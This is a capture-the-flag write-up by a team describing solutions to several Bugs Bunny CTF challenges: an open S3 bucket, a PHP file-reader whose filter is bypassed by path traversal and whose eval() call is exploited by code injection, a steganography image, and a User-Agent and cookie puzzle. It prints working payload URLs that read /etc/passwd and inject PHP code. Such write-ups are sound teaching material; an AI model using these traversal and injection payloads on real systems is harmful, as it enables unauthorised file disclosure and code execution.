Here are some of the Writeup for Bugs Bunny Capture The Flag challenges. As most of the services are down, I would be adding Write-ups one after the another for the services which are up currently. We participate as dcua team, group of awesome people trying the best effort for the challenges.
Web 350
Solver(s) : Aaditya Purani
There was one link given in the question
http://www.chouaibhm.me/
Opening the website, It is just a one-page site. We cannot really do much here. Viewing the source-code reveals a fake flag
<!– Bugs_Bunny{dont_be_stupid}—>
Now, Intuitively I started to search for special directories (apart from js, css, img etc) and files. I noticed that returned 200 Status whereas rest all displayed ‘NoSuchKey’
http://www.chouaibhm.me/META-INF/ http://www.chouaibhm.me/WEB-INF/
Directory listing was not there. But it is was trivial by then to view this as an s3 bucket. Hence, I fired up my terminal and used aws-cli
$ aws s3 ls s3://www.chouaibhm.me/ [res] PRE QnVnc19CdW5ueXtZMHVfNHJlX0MwMDFfdDBkYXlfRHVkM30/ PRE css/ PRE img/ PRE js/ PRE sass/ PRE vendor/ 2017-07-20 03:04:47 52157 index.html
Nice, we can read the s3 bucket. Using the similar command to go inside the first directory we see there exist a flag.txt
$ curl http://www.chouaibhm.me/QnVnc19CdW5ueXtZMHVfNHJlX0MwMDFfdDBkYXlfRHVkM30/flag.txt you are so close don't be stupid tho xD Bugs_Bunny{I_am_JOking_lol}
That is also not the flag. But as we can notice the directory is base64.
$ echo -e "QnVnc19CdW5ueXtZMHVfNHJlX0MwMDFfdDBkYXlfRHVkM30=" | base64 -d Bugs_Bunny{Y0u_4re_C001_t0day_Dud3}
That’s it. Pretty simple
Web 150 (MindReader)
Solver(s) : Aaditya Purani & solarwind
URL: http://52.53.151.123/web/web100/
Note that, We were the 2nd team to solve this challenge after it was launched (~30 minutes). When we solved, It was running on the above mentioned URL. Hence, our write-up would specifically show how we solved for that URL.
Visiting the domain gives us as below:
We can see that there is a placeholder which says file/readme.txt .So, we think evil here and start by inputting /etc/passwd . Gives us custom error as a troll. So, It’s not that easy. Hence, we input file/readme.txt and we can see it does read the file. Cool !
I tried using php:// wrapper like PHP://filter/convert.base64-encode/resource= . Such techniques are mentioned here. It works, but for file/readme.txt specifically. Our goal is to read break out of it. I noticed that, anything except file/readme.txt threw custom error. Time to fiddle !
This is basically how traversal works
$ ls dir1/ #dir1 contains file1.txt file1.txt $ cat dir1/file1.txt #concat file1.txt to stdout $ cat dir1/../dir1/file.txt #works same as above
So what do you notice ? It’s not confusing at all. Here is breaking
$ cat dir1/../dir1/file.txt ^ ^ | | ________ Same dir /../ moves one directory back , so you reach where you were before
Now that you know the basics you can fetch like
http://52.53.151.123/web/web100/readMinder.php?file=file/../file/readme.txt
This works. Hence, Traversal is possible between directories. But there is a filter as already mentioned otherwise I could have traversed till /etc/passwd before. So, let’s defeat it.
http://52.53.151.123/web/web100/readMinder.php?file=file/../file/readme.txt.blah (Blank Page) http://52.53.151.123/web/web100/readMinder.php?file=file/../file/roastme.txt (Custom Error) http://52.53.151.123/web/web100/readMinder.php?file=file/../file/readme.omg (Blank Page)
anything with readme worked. In order to traverse your end path should be the file you want to read. In my case, I don’t want to read junk like readme.* but particularly interested in juicy files. How about adding readme at the beginning :p
http://52.53.151.123/web/web100/readMinder.php?file=readme/../file/readme.txt
Throws Custom Error. Nice, they hate readme as pre-fix. I padded the pre-fix with xxx and suffix my working payload was
http://52.53.151.123/web/web100/readMinder.php?file=xxxreadmex/../file/readme.txt
Yikes. Broke out of the filter, within no time. I could access /etc/passwd
http://52.53.151.123/web/web100/readMinder.php?file=xxxreadmex/../../../../../../etc/passwd
Now, we can also read the source of readMinder.php , thanks to solarwind.
http://52.53.151.123/web/web100/readMinder.php?file=xxxreadmex/../readMinder.php http://52.53.151.123/web/web100/readMinder.php?file=xxxreadmex/../flag/flag.txt
flag.txt was a troll too. I started reading Source to esclate this
56) exit("file name too long dude :v !"); $filename = basename($file); if (!strpos($file, "readme")) exit("Not The good Way bro 😉 !"); echo " "; readfile($file); echo " "; eval("fwrite(fopen('flag/flag.txt','a'),'$filename');"); ?>
Spot the Bug. ! We can control the $file, hence $filename too. basename() function returns the filename from a path. That $filename goes to eval(). If you are a security guy, you won’t need introduction for the eval(). So, In this case we control what’s going into eval. and we can break out of it
eval("fwrite(fopen('flag/flag.txt','a'),'');echo('aaditya');"); ?>
Payload: ‘);echo(‘aaditya
Now, we own the plot from here. Below, is the vector by solarwind using glob() to find files
http://52.53.151.123/web/web100/readMinder.php?file=xreadme.txt');var_dump(glob('*'));die('END
and
view-source: http://52.53.151.123/web/web100/key/key.txt Bugs_bunny{R3adf1le_15_n0t_G00d}
Steg100
We were given an Image, I tried to refine the image via GIMP editor. Here are the results
We can notice the flag now (It’s not much sharp in the image) : BUGS_BUNNY{Odd_2nd_3V3N_2r3nt_funNy}
Web 30
URL: http://52.53.151.123/web/web30.php
Visiting the page shows that your User-Agent is not Bugs_Bunny Browser. We can tamper with User-Agent by using ‘User-Agent Switcher’ plugin and creating an agent with Bugs_Bunny Browser.
After refreshing, we reach the next page which says (1/2) This is your key maybe you need twice “Hashkiller” . We can open Burp-Suite and start Intercepting the request. There is a
Cookie: flag=zn8XhqnlBRBetevoFcSQAw0OMVH6Kwj23svbneF1+5gDfBdn9osZBfB06c Tub4ARg3OTTjsBIG7x
It’s a custom encryption. As the Hint suggests Hashkiller, we proceed to https://hashkiller.co.uk/text-encryption.aspx
and decrypt the cipher-text with key ‘Hashkiller’ and we get the flag
Bugs_Bunny{hashkiller_has_a_custom_encryption_ algorithm}
Conclusion:
We finished 1st at the end of the competition. Credits and Shouts to the Team.
Aaditya Purani - Hacker 